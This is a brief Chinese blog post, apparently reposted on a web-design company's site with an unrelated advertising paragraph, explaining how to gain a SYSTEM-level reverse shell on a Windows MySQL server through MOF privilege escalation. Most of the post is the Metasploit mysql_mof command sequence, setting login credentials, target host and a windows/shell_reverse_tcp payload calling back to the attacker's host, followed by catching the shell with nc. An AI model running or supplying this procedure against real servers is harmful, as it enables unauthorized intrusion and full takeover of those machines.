mysqlmof+metasploit反弹shell
鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 MySQL mof提权
成都创新互联专业为企业提供弥勒网站建设、弥勒做网站、弥勒网站设计、弥勒网站制作等企业网站建设、网页设计与制作、弥勒企业网站模板建站服务,十载弥勒做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网
use exploit/windows/mysql/mysql_mof set password xxx //设置登录mysql的密码 set username xxx //设置登录mysql的用户 set rhost xxx //设置要登录的ip地址 set rport xxxx //设置mysql的端口号 set payload windows/shell_reverse_tcp //所使用的反弹模块 set lhost xxx //反弹到的ip地址 set lport xxx //反弹到的端口 show options //设置完成后,使用该命令可查看设置参数情况 exploit //执行
如没问题,即exploit执行
这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行
错误之处,敬请指正
本文名称:mysqlmof+metasploit反弹shell
标题链接:http://myzitong.com/article/jhcehj.html